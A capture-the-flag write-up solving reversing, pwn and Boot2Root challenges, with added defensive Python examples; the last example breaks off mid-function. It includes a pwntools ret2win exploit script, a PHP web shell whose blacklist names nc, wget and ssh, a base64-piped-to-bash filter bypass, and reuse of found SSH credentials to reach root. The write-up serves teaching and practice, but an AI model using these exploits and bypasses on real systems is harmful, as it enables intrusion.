This category had various challenges based on reverse engineering, pwn, and Boot2Root machines, and I was able to do all of them except two pwn challenges LOL, I suck at pwn ;P
This challenge had an attachment which was an Android APK file, and I had to reverse engineer it and get the flag. The description was as follows:
Most security-aware developers use a byte array trick to hide api keys and other sensitive info in the application. I challenge you to get the flag :)
It was worth 50 points and had 6 solves, so let's break it down. I first unzipped the APK and then used the tree command to list all the directories and what's inside them:
│ ├── layout-v26
│ │ ├── abc_screen_toolbar.xml
│ │ └── mtrl_calendar_month.xml
│ ├── layout-watch-v20
│ │ ├── abc_alert_dialog_button_bar_material.xml
│ │ └── abc_alert_dialog_title_material.xml
│ ├── mipmap-anydpi-v26
│ │ ├── ic_launcher_round.xml
│ │ └── ic_launcher.xml
│ ├── mipmap-hdpi-v4
│ │ ├── ic_launcher_round.webp
│ │ └── ic_launcher.webp
│ ├── mipmap-mdpi-v4
│ │ ├── ic_launcher_round.webp
│ │ └── ic_launcher.webp
│ ├── mipmap-xhdpi-v4
│ │ ├── ic_launcher_round.webp
│ │ └── ic_launcher.webp
│ ├── mipmap-xxhdpi-v4
│ │ ├── ic_launcher_round.webp
│ │ └── ic_launcher.webp
│ ├── mipmap-xxxhdpi-v4
│ │ ├── ic_launcher_round.webp
│ │ └── ic_launcher.webp
│ ├── raw
│ │ └── oauth.txt
│ └── xml
│ ├── standalone_badge_gravity_bottom_end.xml
│ ├── standalone_badge_gravity_bottom_start.xml
│ ├── standalone_badge_gravity_top_start.xml
│ ├── standalone_badge_offset.xml
│ └── standalone_badge.xml
└── resources.arsc
Inside /res/raw/ there is an oauth.txt. STRANGE, why would such a file exist? So I read what's inside it:
┌──(tahaafarooq㉿kali)-[~/Desktop/tribe_ctf/rev/bits_and_bytes]
└─$ cat res/raw/oauth.txt
116 114 105 98 101 99 116 102 123 98 121 116 101 95 97 114 114 97 121 95 116 114 105 99 107 95 105 116 95 105 115 125
And there it was: decimal byte values. I converted them back to characters and finally got the flag:
tribectf{byte_array_trick_it_is}
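Added example, not part of the original writeup: a small Python decoder for the "byte array trick". It takes the oauth.txt content above plus two constructed samples in the forms the trick usually takes in Java/Kotlin source (decimal and 0x-hex literals), turns them back into bytes, and reports the ones that decode to printable text. The point for developers is that a byte array in a shipped resource or class file is not obfuscation at all; anyone with the APK gets the value back in one step.

```python
import re

# Constructed inputs. The first is the res/raw/oauth.txt content from the APK in the
# writeup; the other two are the same trick as it usually appears in Java/Kotlin source.
SAMPLES = {
    "res/raw/oauth.txt": "116 114 105 98 101 99 116 102 123 98 121 116 101 95 97 114 114 97 121 95 116 114 105 99 107 95 105 116 95 105 115 125",
    "Java decimal literal": "byte[] key = {116, 114, 105, 98, 101};",
    "Kotlin hex literal": "val key = byteArrayOf(0x74, 0x72, 0x69, 0x62, 0x65)",
}

_HEX_BYTE = re.compile(r"0x([0-9a-fA-F]{1,2})\b")
_DEC_BYTE = re.compile(r"(?<![\w.])(\d{1,3})(?![\w.])")   # standalone 1-3 digit numbers only


def decode_byte_array(text):
    """Return the bytes spelled out by a decimal or hex byte-array literal, or None.

    Hex tokens (0x..) take precedence; otherwise every standalone 1-3 digit number
    is read as one byte. A value above 255 means the text is not a byte array."""
    tokens = _HEX_BYTE.findall(text)
    values = [int(t, 16) for t in tokens] if tokens else [int(t) for t in _DEC_BYTE.findall(text)]
    if not values or max(values) > 255:
        return None
    return bytes(values)


def is_printable_ascii(data):
    return all(32 <= b < 127 for b in data)


def scan(samples):
    """Map each sample name to the recovered string when it decodes to printable text."""
    hits = {}
    for name, text in samples.items():
        decoded = decode_byte_array(text)
        if decoded and is_printable_ascii(decoded):
            hits[name] = decoded.decode("ascii")
    return hits


if __name__ == "__main__":
    for name, value in scan(SAMPLES).items():
        print(f"{name}: {value}")
```

Running it prints the flag for the oauth.txt sample and "tribe" for the two constructed literals; feeding it `strings` output from a decompiled APK works the same way.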
This challenge was an executable, but ARM based, worth 100 points. The description was as follows:
This challenge is based on basic arm based stack buffer overflow
I tried executing the binary on my system, but it doesn't run, so I checked the strings instead, and inside the strings I found the flag:
┌──(tahaafarooq㉿kali)-[~/Desktop/tribe_ctf/rev]
└─$ rabin2 -z bof
[Strings]
nth paddr vaddr len size section type string
―――――――――――――――――――――――――――――――――――――――――――――――――――――――
0 0x00000550 0x00010550 36 37 .rodata ascii tribectf{alwayz_sanitize_user_input}
1 0x0000057c 0x0001057c 16 17 .rodata ascii You entered: %s\n
FLAG : tribectf{alwayz_sanitize_user_input}
A buffer-overflow type challenge, attached with a binary. The description was as follows:
Where there is a buffer overflow there is a way. checkout this target: 191.101.169.29:9090
It was worth 50 points. I downloaded the file to examine it on my system:
┌──(tahaafarooq㉿kali)-[~/Desktop/tribe_ctf/rev/butter_overflow]
└─$ ./butteroverflow
Overflow me: AAAAA
Oops! Did not work.
So I pulled this binary up in gdb for more analysis; first I check the functions:
┌──(tahaafarooq㉿kali)-[~/Desktop/tribe_ctf/rev/butter_overflow]
└─$ gdb -q butteroverflow
Reading symbols from butteroverflow...
(No debugging symbols found in butteroverflow)
gdb-peda$ info functions
All defined functions:
Non-debugging symbols:
0x0000000000401000 _init
0x0000000000401030 puts@plt
0x0000000000401040 printf@plt
0x0000000000401050 fgets@plt
0x0000000000401060 gets@plt
0x0000000000401070 setvbuf@plt
0x0000000000401080 fopen@plt
0x0000000000401090 exit@plt
0x00000000004010a0 _start
0x00000000004010d0 _dl_relocate_static_pie
0x00000000004010e0 deregister_tm_clones
0x0000000000401110 register_tm_clones
0x0000000000401150 __do_global_dtors_aux
0x0000000000401180 frame_dummy
0x0000000000401182 win
0x00000000004011ee init
0x0000000000401231 main
0x00000000004012a0 __libc_csu_init
0x0000000000401300 __libc_csu_fini
0x0000000000401304 _fini
So we have main and win functions that are interesting, so I try breaking down the main function in radare2:
And we can fully see now what's happening. The most fascinating part of all is how it compares rax with rdx and then either jumps if the values aren't as expected or calls the sym.win function. I now read the sym.win function:
[0x7f2b1fb55050]> pdf @sym.win
; CALL XREF from main @ 0x40127b
┌ 108: sym.win ();
│ ; var int64_t var_30h @ rbp-0x30
│ ; var int64_t var_8h @ rbp-0x8
│ 0x00401182 55 push rbp
│ 0x00401183 4889e5 mov rbp, rsp
│ 0x00401186 4883ec30 sub rsp, 0x30
│ 0x0040118a 488d35770e00. lea rsi, [0x00402008] ; "r"
│ 0x00401191 488d3d720e00. lea rdi, str.flag.txt ; 0x40200a ; "flag.txt"
│ 0x00401198 e8e3feffff call sym.imp.fopen ; file*fopen(const char *filename, const char *mode)
│ 0x0040119d 488945f8 mov qword [var_8h], rax
│ 0x004011a1 48837df800 cmp qword [var_8h], 0
│ ┌─< 0x004011a6 7516 jne 0x4011be
│ │ 0x004011a8 488d3d690e00. lea rdi, str.There_was_an_error_opening_the_file._Contact_admin_if_it_doesnt_work_on_the_server_:_ ; 0x402018 ; "There was an error opening the file. Contact admin if it doesnt work on the server :)"
│ │ 0x004011af e87cfeffff call sym.imp.puts ; int puts(const char *s)
│ │ 0x004011b4 bf01000000 mov edi, 1
│ │ 0x004011b9 e8d2feffff call sym.imp.exit ; void exit(int status)
│ └─> 0x004011be 488b55f8 mov rdx, qword [var_8h]
│ 0x004011c2 488d45d0 lea rax, [var_30h]
│ 0x004011c6 be1e000000 mov esi, 0x1e ; 30
│ 0x004011cb 4889c7 mov rdi, rax
│ 0x004011ce e87dfeffff call sym.imp.fgets ; char *fgets(char *s, int size, FILE *stream)
│ 0x004011d3 488d45d0 lea rax, [var_30h]
│ 0x004011d7 4889c6 mov rsi, rax
│ 0x004011da 488d3d8d0e00. lea rdi, str.flag:__s__n ; 0x40206e ; "flag: %s \n"
│ 0x004011e1 b800000000 mov eax, 0
│ 0x004011e6 e855feffff call sym.imp.printf ; int printf(const char *format)
│ 0x004011eb 90 nop
│ 0x004011ec c9 leave
└ 0x004011ed c3 ret
And here I now understand how it all works from the decompiled code of the main function:
undefined8 main(void)
{
    char *s;
    init();
    printf("Overflow me: ");
    gets(&s);
    if (_target == 0xdeadbeef) {
        win();
    } else {
        puts("Oops! Did not work.");
    }
    return 0;
}
It sets one variable s of type char, reads into it with gets() (which has no length limit), then compares _target with 0xdeadbeef; if they are equal it calls win(), otherwise it prints out the error. Turns out this binary isn't secure at all, so I then make my own flag.txt and do dynamic analysis, but first I try to find the offset:
So the offset is 32! Now that we know the offset, the address of win and the address of main, and since the binary isn't protected, I just wrote a quick script to test it locally:
#!/usr/bin/python3
# author : tahaafarooq
from pwn import *

#p = remote('191.101.169.29', 9090)
p = process('./butteroverflow')

win_addr = 0x401182   # sym.win, from the function list above
main = 0x401294       # lies inside main (main starts at 0x401231); used as the first return target
offset = 32           # bytes before the saved return address (locally; the remote instance needed 40)

overflow = b'A' * offset
payload = overflow
payload += p64(main)
payload += p64(win_addr)

# pwntools wants bytes for the delimiter; passing a str is what triggers the BytesWarning in the output below
p.sendlineafter(b'Overflow me:', payload)
p.interactive()
I run it and boom, unexpectedly I have the flag with the ret2win concept LEL:
┌──(tahaafarooq㉿kali)-[~/Desktop/tribe_ctf/rev/butter_overflow]
└─$ python3 solver.py
[+] Starting local process './butteroverflow': pid 5589
/home/tahaafarooq/.local/lib/python3.9/site-packages/pwnlib/tubes/tube.py:822: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
res = self.recvuntil(delim, timeout=timeout)
[*] Switching to interactive mode
Oops! Did not work.
flag: helloworld
[*] Got EOF while reading in interactive
But when I tried running it against the remote binary it didn't work, so I started increasing the offset "NOOB ALERT", and when I reached 40 it worked!
┌──(tahaafarooq㉿kali)-[~/Desktop/tribe_ctf/rev/butter_overflow]
└─$ python3 solver.py
[+] Opening connection to 191.101.169.29 on port 9090: Done
/home/tahaafarooq/.local/lib/python3.9/site-packages/pwnlib/tubes/tube.py:822: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
res = self.recvuntil(delim, timeout=timeout)
[*] Switching to interactive mode
Oops! Did not work.
flag: TRIBECTF{N@_5TR1NG5_4TT4CH3D}
[*] Got EOF while reading in interactive
FLAG : TRIBECTF{N@_5TR1NG5_4TT4CH3D}
Description:
there have been tricks used to disguise malware on this artifact can you discover the hidden content
This challenge was worth 100 points and came with an attachment. I first gathered some information about the file because it was in .so format, which confused me, but after a few commands:
┌──(tahaafarooq㉿kali)-[~/Desktop/tribe_ctf/rev/artifact]
└─$ file fixme.so
fixme.so: Zip archive data, at least v2.0 to extract
┌──(tahaafarooq㉿kali)-[~/Desktop/tribe_ctf/rev/artifact]
└─$ xxd fixme.so | head -n 4
00000000: 504b 0304 1400 0808 0800 0000 2100 0000 PK..........!...
00000010: 0000 0000 0000 0000 0000 1400 0d00 4d45 ..............ME
00000020: 5441 2d49 4e46 2f4d 414e 4946 4553 542e TA-INF/MANIFEST.
00000030: 4d46 5554 0500 01d0 7bce 12fe ca00 00f3 MFUT....{.......
I realized it was a Zip archive, so I unzipped it and got the following:
┌──(tahaafarooq㉿kali)-[~/Desktop/tribe_ctf/rev/artifact]
└─$ ls -la
total 4472
drwxr-xr-x 4 tahaafarooq sudo 4096 Oct 25 08:17 .
drwxr-xr-x 10 tahaafarooq sudo 4096 Oct 25 07:11 ..
-rw-r--r-- 1 tahaafarooq sudo 4557522 Oct 23 14:09 fixme.so
-rw-r--r-- 1 tahaafarooq sudo 664 Dec 31 1979 GimmeheadKt.class
drwxr-xr-x 22 tahaafarooq sudo 4096 Oct 25 08:17 kotlin
drwxr-xr-x 4 tahaafarooq sudo 4096 Oct 25 08:17 META-INF
First thing, I try to read GimmeheadKt.class:
And boom, I got the flag, so unexpected :))
FLAG : tribectf{i_knew_youd_fix_me:)}
Description:
Daniel Hale Williams is standing up a new web server to support the opening of his health organization “Cardio Center”. Take a look to see if there are any issues he should address before making it public. Target Address : 191.101.169.219
Now it's a machine :} so I first perform a network scan:
┌──(tahaafarooq㉿kali)-[~/Desktop/tribe_ctf/rev/heart]
└─$ nmap -A 191.101.169.219 -oN nmap-sacn
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-25 08:24 EDT
Nmap scan report for mail.beerclues.com (191.101.169.219)
Host is up (0.24s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
21/tcp open tcpwrapped
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 6e:49:d3:94:be:0c:04:e2:e9:2d:ef:e5:a9:4c:1b:b9 (RSA)
| 256 2c:2a:69:78:b7:ab:0c:83:80:01:3c:80:4f:f4:77:15 (ECDSA)
|_ 256 7c:e7:04:cc:ad:d9:d2:5e:c3:7a:5b:06:98:fc:1d:54 (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: heart, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING,
| ssl-cert: Subject: commonName=heart
| Subject Alternative Name: DNS:heart
| Not valid before: 2021-10-11T21:02:25
|_Not valid after: 2031-10-09T21:02:25
|_ssl-date: TLS randomness does not represent time
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 2 disallowed entries
|_/images/DHW.jpg /development.txt
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Cardiology Website Template
Service Info: Host: heart; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 85.18 seconds
So we have 4 ports open, including 80, which has a robots.txt with some interesting information. I open the site in the browser and then curl robots.txt:
┌──(tahaafarooq㉿kali)-[~]
└─$ curl --request GET http://191.101.169.219/robots.txt
User-agent: *
Disallow: /images/DHW.jpg
Disallow: /development.txt
I now read the development.txt file and see what's inside it:
┌──(tahaafarooq㉿kali)-[~]
└─$ curl --request GET http://191.101.169.219/development.txt
The annoying Hospital administrators said I needed to move my development files.
I have moved one of the files to old.php
Wow, so we have a file named old.php that requires attention, and attention it shall get :)
┌──(tahaafarooq㉿kali)-[~]
└─$ curl --request GET http://191.101.169.219/old.php
<html>
<body>
<style>
#back{
position: fixed;
top: 0;
left: 0;
min-width: 100%;
min-height: 100%;
z-index:-10
}
#shell{
color: white;
text-align: center;
}
</style>
<!-- TRIBECTF{Ch1ef_Surg30n_@t_Freedmen} -->
<div id="shell">
<h2>
dev_shell
</h2>
<form action="dev_shell.php" method="post">
Command: <input type="text" name="in_command" /> <br>
<input type="submit" value="submit">
</form>
<br>
<h5>Output:</h5>
</div>
<img src="dev_shell_back.png" id="back" alt="">
</body>
</html>
So I got the Heart 1 Flag: TRIBECTF{Ch1ef_Surg30n_@t_Freedmen}
From what we saw in old.php it looks like a web shell, so I now try to play around with it and see what I can do:
┌──(tahaafarooq㉿kali)-[~]
└─$ curl --request POST http://191.101.169.219/dev_shell.php? -d "in_command=whoami"
<html>
<body>
<style>
#back{
position: fixed;
top: 0;
left: 0;
min-width: 100%;
min-height: 100%;
z-index:-10
}
#shell{
color: white;
text-align: center;
}
</style>
<!-- WIP, don't forget to report any bugs we don't want another breach guys-->
<div id="shell">
<h2>
dev_shell
</h2>
<form action="dev_shell.php" method="post">
Command: <input type="text" name="in_command" /> <br>
<input type="submit" value="submit">
</form>
<br>
<h5>Output:</h5>
www-data
</div>
<img src="dev_shell_back.png" id="back" alt="">
</body>
</html>
Okay, so it works. Now let's try listing directories and files:
<h5>Output:</h5>
Get out skid lol
Alright, that didn't work out perfectly, so they blacklisted some commands :} I then try reading old.php using the less command, and it looks like blacklisting isn't the way to go :)
<?php
//inspired by c0rruptedb1t
$invalid = 0;
$command = ($_POST['in_command']);
$bad_words = array("pwd", "ls", "netcat", "ssh", "wget", "ping", "traceroute", "cat", "nc");
?>
<style>
    #back{
        position: fixed;
        top: 0;
        left: 0;
        min-width: 100%;
        min-height: 100%;
        z-index:-10
    }
    #shell{
        color: white;
        text-align: center;
    }
</style>
<!-- WIP, don't forget to report any bugs we don't want another breach guys-->
<div id="shell">
    <h2>
        dev_shell
    </h2>
    <form action="dev_shell.php" method="post">
        Command: <input type="text" name="in_command" /> <br>
        <input type="submit" value="submit">
    </form>
    <br>
    <h5>Output:</h5>
    <?php
    system("running command...");
    //executes system Command
    //checks for sneaky ;
    if (strpos($command, ';') !==false){
        system("echo Nice try skid, but you will never get through this bulletproof php code"); //doesn't work :P
    }
    else{
        $is_he_a_bad_man = explode(' ', trim($command));
        //checks for dangerous commands
        if (in_array($is_he_a_bad_man[0], $bad_words)){
            system("echo Get out skid lol");
        }
        else{
            system($_POST['in_command']);
        }
    }
    ?>
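Added example, not the challenge's code: the check in the PHP above re-implemented in Python so you can see exactly what it does and does not look at (only the first space-separated token, and only a literal `;`), beside the design that actually fixes this class of bug: the client names an action from a fixed list and the server owns the argv, so no user string ever reaches a shell. The `compare` helper runs both checks on the two requests from this writeup plus one ordinary action; the allowlist names are constructed.

```python
# Blacklist copied from the challenge's dev_shell.php; everything around it is a
# constructed test harness, not the challenge's own code.
BAD_WORDS = {"pwd", "ls", "netcat", "ssh", "wget", "ping", "traceroute", "cat", "nc"}


def php_filter_allows(command: str) -> bool:
    """Mirror of the PHP logic: reject ';' anywhere, otherwise compare only the
    first element of explode(' ', trim($command)) against $bad_words."""
    if ";" in command:
        return False
    first_token = command.strip().split(" ")[0]   # explode(' ', ...) splits on a single space only
    return first_token not in BAD_WORDS


# Allowlist alternative (hypothetical replacement for the shell above): the client
# sends an action name, the server maps it to a fixed argv, nothing is interpreted.
ALLOWED_ACTIONS = {
    "uptime": ["uptime"],
    "disk": ["df", "-h"],
    "whoami": ["whoami"],
}


def build_allowlisted_argv(action: str) -> list:
    """Return the fixed argv for an approved action name; anything else is refused.
    The returned list is meant for subprocess.run(argv, shell=False)."""
    if action not in ALLOWED_ACTIONS:
        raise ValueError(f"action not permitted: {action!r}")
    return list(ALLOWED_ACTIONS[action])


def compare(commands):
    """For each input: does the blacklist let it through, and does the allowlist?"""
    rows = []
    for cmd in commands:
        try:
            build_allowlisted_argv(cmd)
            allowlisted = True
        except ValueError:
            allowlisted = False
        rows.append((cmd, php_filter_allows(cmd), allowlisted))
    return rows


if __name__ == "__main__":
    # The two requests from the writeup plus one ordinary allowed action.
    for cmd, bl, al in compare(["whoami", "ls -la", "echo 'bHMgLWxhCg==' | base64 -d | bash"]):
        print(f"{cmd!r:45} blacklist_allows={bl!s:5} allowlist_allows={al}")
```

The output makes the difference visible: the blacklist stops `ls -la` but waves the base64 pipeline through, while the allowlist refuses both because neither is an action name.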
I now know the blacklisted words, so what I do next is list the directory by base64-encoding the command so the first word isn't on the list:
My machine:
┌──(tahaafarooq㉿kali)-[~/Desktop/tribe_ctf/rev/butter_overflow]
└─$ echo "ls -la" | base64
bHMgLWxhCg==
WEB SHELL:
┌──(tahaafarooq㉿kali)-[~]
└─$ curl --request POST http://191.101.169.219/dev_shell.php? -d "in_command=echo 'bHMgLWxhCg==' | base64 -d | bash"
<html>
<body>
<style>
#back{
position: fixed;
top: 0;
left: 0;
min-width: 100%;
min-height: 100%;
z-index:-10
}
#shell{
color: white;
text-align: center;
}
</style>
<!-- WIP, don't forget to report any bugs we don't want another breach guys-->
<div id="shell">
<h2>
dev_shell
</h2>
<form action="dev_shell.php" method="post">
Command: <input type="text" name="in_command" /> <br>
<input type="submit" value="submit">
</form>
<br>
<h5>Output:</h5>
total 1260
drwxr-xr-x 5 root root 4096 Oct 11 21:04 .
drwxr-xr-x 4 root root 4096 Oct 11 21:04 ..
-rw-r--r-- 1 root root 3559 Sep 21 19:45 about.html
-rw-r--r-- 1 root root 5562 Sep 21 19:45 blog-single.html
-rw-r--r-- 1 root root 6075 Sep 21 19:45 blog.html
-rw-r--r-- 1 root root 4039 Sep 21 19:45 contact.html
drwxr-xr-x 2 root root 4096 Sep 21 19:45 css
-rw-r--r-- 1 root root 1408 Sep 21 19:45 dev_shell.php
-rw-r--r-- 1 root root 1177950 Sep 21 19:45 dev_shell_back.png
-rw-r--r-- 1 root root 124 Sep 21 19:45 development.txt
-rw-r--r-- 1 root root 7231 Sep 21 19:45 doctors.html
drwxr-xr-x 7 root root 4096 Sep 21 19:45 fonts
-rw-r--r-- 1 root root 3805 Sep 21 19:45 forms.html
-rw-r--r-- 1 root root 3222 Sep 21 19:45 heart-monitoring-procedure.html
-rw-r--r-- 1 root root 4391 Sep 21 19:45 heart-monitoring.html
-rw-r--r-- 1 root root 2556 Sep 21 19:45 heart-treatments.html
drwxr-xr-x 2 root root 4096 Sep 21 19:45 images
-rw-r--r-- 1 root root 3218 Sep 21 19:45 index.html
-rw-r--r-- 1 root root 177 Sep 21 19:45 index.php
-rw-r--r-- 1 root root 1355 Sep 21 19:45 old.php
-rw-r--r-- 1 root root 67 Sep 21 19:45 robots.txt
-rw-r--r-- 1 root root 4880 Sep 21 19:45 services.html
-rw-r--r-- 1 root root 145 Sep 21 19:45 z_reminder.txt
</div>
<img src="dev_shell_back.png" id="back" alt="">
</body>
</html>
And there we have it :)) There is an interesting text file, z_reminder.txt. I now try to read it!
┌──(tahaafarooq㉿kali)-[~/Desktop/tribe_ctf/rev/butter_overflow]
└─$ curl --request GET http://191.101.169.219/z_reminder.txt
I can remember the 12 parts of the human heart but not my password
username: dhwilliams
password: Pr0vident_h0spital
~D.H. Williams
And as seen we have creds, but then I remember we don't have any login portal on the website. Then I remember we have SSH, so I guessed maybe they are SSH creds. Let's try our luck!
┌──(tahaafarooq㉿kali)-[~]
└─$ ssh dhwilliams@191.101.169.219
dhwilliams@191.101.169.219's password:
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-88-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon 25 Oct 2021 12:46:18 PM UTC
System load: 0.0 Processes: 231
Usage of /: 41.1% of 19.56GB Users logged in: 0
Memory usage: 9% IPv4 address for ens160: 191.101.169.219
Swap usage: 0%
* Super-optimized for small spaces - read how we shrank the memory
footprint of MicroK8s to make it the smallest full K8s around.
https://ubuntu.com/blog/microk8s-memory-optimisation
97 updates can be installed immediately.
1 of these updates is a security update.
To see these additional updates run: apt list --upgradable
*** System restart required ***
Last login: Mon Oct 25 04:33:50 2021 from 172.251.246.2
dhwilliams@heart:~$
And I am in :)) Now then, with that done :)) I find the second flag inside Desktop!
dhwilliams@heart:~$ cd Desktop
dhwilliams@heart:~/Desktop$ ls
flag2.txt
dhwilliams@heart:~/Desktop$ cat flag.txt
cat: flag.txt: No such file or directory
dhwilliams@heart:~/Desktop$ cat flag2.txt
TRIBECTF{Op3n3d_Fir$t_Int3rr@ci@l_H0spit@l}
FLAG:TRIBECTF{Op3n3d_Fir$t_Int3rr@ci@l_H0spit@l}
Now for the third flag; it must be inside root's directory, so let's check what sudo privileges our user has so we know how to elevate our privileges:
dhwilliams@heart:~/Desktop$ sudo -l
[sudo] password for dhwilliams:
Matching Defaults entries for dhwilliams on heart:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User dhwilliams may run the following commands on heart:
(ALL : ALL) ALL
Wow, so we can just be root then LMAO :)) EZPIZI
root@heart:/home/root# cd Desktop
root@heart:/home/root/Desktop# ls
flag3.txt
root@heart:/home/root/Desktop# cat flag3.txt
TRIBECTF{Co-f0und3d_th3e_N@tion@l_M3dic@l_Associ@ti0n}
And there we go:))
FLAG: TRIBECTF{Co-f0und3d_th3e_N@tion@l_M3dic@l_Associ@ti0n}
Description:
One of our fellow engineers came across a familiar encoding scheme in a malware sample and recreated it in his own binary. Somehow he lost the original file. Can you help him figure out the encoding string to get the flag?
It's a reverse engineering challenge, so I try running the binary and it asks for a password:
┌──(tahaafarooq㉿kali)-[~/Desktop/tribe_ctf/rev]
└─$ ./hello_world
What is the password?: 1231333
That was Incorrect, try again!
I try reading the strings with rabin2 but find nothing there either:
┌──(tahaafarooq㉿kali)-[~/Desktop/tribe_ctf/rev]
└─$ rabin2 -z hello_world
[Strings]
nth paddr vaddr len size section type string
―――――――――――――――――――――――――――――――――――――――――――――――――――――――
0 0x00002008 0x00002008 4 5 .rodata ascii \n%s\n
1 0x0000200d 0x0000200d 23 24 .rodata ascii What is the password?:
2 0x00002028 0x00002028 31 32 .rodata ascii \nThat was Incorrect, try again!
Then I try running the strings command and I find a weird pattern:
ABCDEFGHH
IJKLMNOPH
QRSTUVWXH
YZabcdefH
ghijklmnH
opqrstuvH
wxyz0123H
456789+/H
aGVsbG9fH
d29ybGRfH
ZnJvbV9SH
RQ==f
Then I notice that it lists the alphabet in capitals, then lowercase letters, then digits (the base64 alphabet), and after that comes a base64 string. I wrote the base64 parts out and they make up aGVsbG9fd29ybGRfZnJvbV9SRQ==
Decoding it I got:
┌──(tahaafarooq㉿kali)-[~]
└─$ echo "aGVsbG9fd29ybGRfZnJvbV9SRQ==" | base64 -d
hello_world_from_RE
So the flag is FLAG : TRIBECTF{hello_world_from_RE}
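Added example, not part of the original writeup: the manual step above (spot the base64 alphabet table, learn the row layout from it, then read the rows that follow with the same layout) written as a Python function that works on raw bytes. The blob it runs on is constructed to mirror the `strings` output above: 8-byte rows with one filler byte between them, surrounded by unrelated bytes. Finding the standard alphabet in a binary is a good detection signal on its own, since it means a hand-rolled base64 routine rather than a library call.

```python
import base64
import string

B64_ALPHABET = (string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/").encode()
_VALID = set(B64_ALPHABET) | {ord("=")}

# Constructed stand-in for the binary's data: the alphabet table and the encoded
# string laid out 8 bytes per row with a filler byte ('H') between rows, as the
# strings output above showed them, surrounded by unrelated bytes.
SAMPLE_BLOB = (
    b"\x7fELF\x00junk\x00"
    + b"H".join(B64_ALPHABET[i:i + 8] for i in range(0, 64, 8)) + b"H"
    + b"aGVsbG9fHd29ybGRfHZnJvbV9SHRQ==f"
    + b"\x00" * 8
)


def locate_table(blob, row=8):
    """Find the base64 alphabet stored in rows; return (start, stride) or None.
    The stride is learned by checking where each successive alphabet row sits."""
    start = blob.find(B64_ALPHABET[:row])
    if start < 0:
        return None
    rows = 64 // row
    for stride in range(row, row + 8):
        if all(blob[start + k * stride: start + k * stride + row] == B64_ALPHABET[k * row:(k + 1) * row]
               for k in range(rows)):
            return start, stride
    return None


def recover_encoded(blob, row=8):
    """Read the rows that follow the alphabet table with the same stride and return
    the base64 text they spell, stopping at padding or at the first non-base64 byte."""
    found = locate_table(blob, row)
    if found is None:
        return None
    start, stride = found
    pos = start + (64 // row) * stride
    out = bytearray()
    while pos + row <= len(blob):
        chunk = blob[pos:pos + row]
        taken = bytearray()
        for b in chunk:
            if b not in _VALID:
                break
            taken.append(b)
        out += taken
        if len(taken) < row or b"=" in taken:
            break
        pos += stride
    if b"=" in out:                      # drop anything trailing the padding and normalise it
        i = out.index(b"=")
        out = out[:i] + b"=" * (-i % 4)
    return bytes(out)


def decode_hidden_string(blob):
    enc = recover_encoded(blob)
    return base64.b64decode(enc) if enc else None


if __name__ == "__main__":
    print(recover_encoded(SAMPLE_BLOB), decode_hidden_string(SAMPLE_BLOB))
```

On the constructed blob it returns the same aGVsbG9fd29ybGRfZnJvbV9SRQ== string and decodes it to hello_world_from_RE; on a real binary you would pass the contents of .rodata or .data.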
Description:
most developers forget to turn off logging in production build and sensitive information such as OAuth tokens, passwords, and such can be simply found by looking at the application logs.
So we are also given an attachment, logd.txt, and we have to get something out of it. This was more than easy, and it had 75 points lol; I just cat it out and I have the flag:
┌──(tahaafarooq㉿kali)-[~/Desktop/tribe_ctf/rev]
└─$ cat logd.txt
##Develper
Chalie/@Chal13W1zz
##challenge Type
Mobile
##Difficulty
Easy/sanity
## Logd
most developers forget to turn off logging in production build and sensitive information such as oauth tokens, passwords and such can be simply found by looking at the application logs.
## Challenge Artifact
logd.apk
## Challenge Solution
tribectf{always_look_for_low_hanging_fruits_in_android_logs}
##Hint
N/A
FLAG : tribectf{always_look_for_low_hanging_fruits_in_android_logs}
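Added example, not part of the original writeup: the description above is the whole lesson, so here is the detection side of it as a Python script. It parses logcat threadtime lines, flags the usual secret-bearing keys (OAuth/access tokens, API keys, passwords) whatever form the value takes (`k=v`, `k: v`, JSON `"k":"v"`), and offers a `redact` function for the fix, masking the value before the line is ever written. The log lines are constructed, not from the challenge's logd.apk.

```python
import re

# Constructed logcat (threadtime format) lines; not output from the challenge's logd.apk.
SAMPLE_LOG = """\
10-25 08:30:01.123  4521  4521 D LoginActivity: starting auth flow
10-25 08:30:02.456  4521  4521 D AuthClient: oauth_token=ya29.EXAMPLE-TOKEN-abc123
10-25 08:30:02.789  4521  4521 V NetUtil: POST /login body={"user":"dh","password":"ExamplePassw0rd!"}
10-25 08:30:03.001  4521  4521 I Billing: api_key: AIzaSyEXAMPLE0000000000000000000000000
10-25 08:30:03.500  4521  4521 D Cache: warmed 12 entries
"""

# date time  PID  TID  priority  TAG: message
_LINE = re.compile(r"^(\S+ \S+)\s+(\d+)\s+(\d+)\s+([VDIWEF])\s+([^:]+):\s*(.*)$")
# key=value / key: value / "key":"value" forms for the usual secret-bearing names
_SECRET = re.compile(
    r'(?i)\b((?:oauth|access|refresh|auth)[_-]?token|api[_-]?key|(?:client[_-]?)?secret|password|passwd)\b'
    r'"?\s*[=:]\s*"?([^\s",}]+)')


def parse_line(line):
    """Split one threadtime line into its fields, or None if it is not a log line."""
    m = _LINE.match(line)
    if not m:
        return None
    ts, pid, tid, prio, tag, msg = m.groups()
    return {"ts": ts, "pid": int(pid), "tid": int(tid), "prio": prio, "tag": tag, "msg": msg}


def scan_logcat(text):
    """Return one finding per secret-looking key/value pair, with the tag and line number."""
    findings = []
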